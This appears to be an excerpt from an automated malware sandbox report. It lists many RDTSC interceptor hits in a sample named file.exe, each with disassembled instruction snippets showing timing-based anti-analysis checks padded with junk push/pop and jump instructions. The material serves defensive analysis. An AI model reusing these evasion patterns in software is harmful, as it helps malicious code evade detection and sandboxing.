Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE41E4 second address: DE421B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3A30F498D5h 0x00000011 jno 00007F3A30F498C6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE421B second address: DE4220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE4220 second address: DE4240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D9h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE79EC second address: DE79F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D65199 second address: D6519D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D6519D second address: D651B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF95h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEDC8C second address: DEDCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30F498D1h 0x00000009 jmp 00007F3A30F498D3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEDCB6 second address: DEDCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEDCBB second address: DEDCDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CAh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jbe 00007F3A30F498C6h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEDCDD second address: DEDCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEE239 second address: DEE23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEE23D second address: DEE241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEE8CC second address: DEE8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEE8D0 second address: DEE8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEE8D4 second address: DEE90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007F3A30F498ECh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEE90C second address: DEE921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEEE11 second address: DEEE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DED4E4 second address: DED4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DED4E8 second address: DED504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DED504 second address: DED50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DED50A second address: DED510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DED510 second address: DED51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F3A30BBDF86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DED51F second address: DED523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DED523 second address: DED529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DED529 second address: DED52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DED52F second address: DED537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF3668 second address: DF367E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jbe 00007F3A30F498C6h 0x0000000c jng 00007F3A30F498C6h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF367E second address: DF368A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3A30BBDF86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D687B9 second address: D687BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D687BD second address: D687C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF89EF second address: DF89F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF89F4 second address: DF89FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF8B50 second address: DF8B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF8B54 second address: DF8BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF8Fh 0x00000007 jl 00007F3A30BBDF86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 jng 00007F3A30BBDF94h 0x00000017 jnl 00007F3A30BBDF9Fh 0x0000001d push esi 0x0000001e jmp 00007F3A30BBDF96h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF8BBB second address: DF8BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF8BC3 second address: DF8BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF8D72 second address: DF8D86 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A30F498C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F3A30F498C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF8D86 second address: DF8D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DF9457 second address: DF945F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFC1A0 second address: DFC1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF8Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFC1B4 second address: DFC1C4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A30F498D2h 0x00000008 jnc 00007F3A30F498C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD42 second address: DFBD46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD46 second address: DFBD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD51 second address: DFBD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD56 second address: DFBD5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD5C second address: DFBD62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD62 second address: DFBD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD66 second address: DFBD8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F3A30BBDF86h 0x0000000f ja 00007F3A30BBDF86h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jnl 00007F3A30BBDF86h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD8A second address: DFBD91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD91 second address: DFBD97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBD97 second address: DFBDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFBDA0 second address: DFBDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFF2F7 second address: DFF2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFEE79 second address: DFEE7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFEE7D second address: DFEE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFEFD7 second address: DFEFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB52A0 second address: DB52A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB52A4 second address: DB52E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b mov ebx, dword ptr [ebp+1249640Eh] 0x00000011 sub dword ptr [ebp+122D26FEh], ebx 0x00000017 add eax, ebx 0x00000019 mov dword ptr [ebp+122D1BA5h], ebx 0x0000001f nop 0x00000020 je 00007F3A30BBDF99h 0x00000026 jmp 00007F3A30BBDF93h 0x0000002b push eax 0x0000002c push ecx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E050C2 second address: E050C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E050C6 second address: E050E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3A30BBDF86h 0x00000008 jmp 00007F3A30BBDF94h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09E6B second address: E09E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09E71 second address: E09E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09E77 second address: E09E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E091C4 second address: E091CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3A30BBDF86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E091CE second address: E091D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E091D4 second address: E091DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E091DA second address: E091E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E094BF second address: E094C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E094C9 second address: E094CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09623 second address: E09629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09629 second address: E09640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F3A30F498D2h 0x0000000b jmp 00007F3A30F498CAh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09640 second address: E09648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09648 second address: E0964C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CE5D second address: E0CE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F3A30BBDF86h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CE6A second address: E0CE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C648 second address: E0C64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CB7C second address: E0CB8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CB8B second address: E0CB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0CB95 second address: E0CB9F instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A30F498C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15E77 second address: E15E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15E80 second address: E15E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13FD3 second address: E13FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F3A30BBDF86h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1412F second address: E1413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jnp 00007F3A30F498DCh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14C9B second address: E14CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF8Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14F9A second address: E14FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1552C second address: E15530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15530 second address: E15536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15536 second address: E15543 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15543 second address: E1556C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30F498D3h 0x00000009 jmp 00007F3A30F498D1h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1556C second address: E15574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B12A second address: D5B157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F3A30F498E5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B157 second address: D5B15C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E193BE second address: E193D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E193D2 second address: E193D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E194F0 second address: E194F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E194F6 second address: E19503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3A30BBDF86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19503 second address: E19509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19509 second address: E1950D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19A9A second address: E19AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19AA0 second address: E19AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19AA4 second address: E19AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19AAF second address: E19AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3A30BBDF8Eh 0x0000000e jmp 00007F3A30BBDF92h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19D8B second address: E19D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F3A30F498C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19D9A second address: E19DA7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19DA7 second address: E19DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25B8F second address: E25B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E25CF1 second address: E25CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
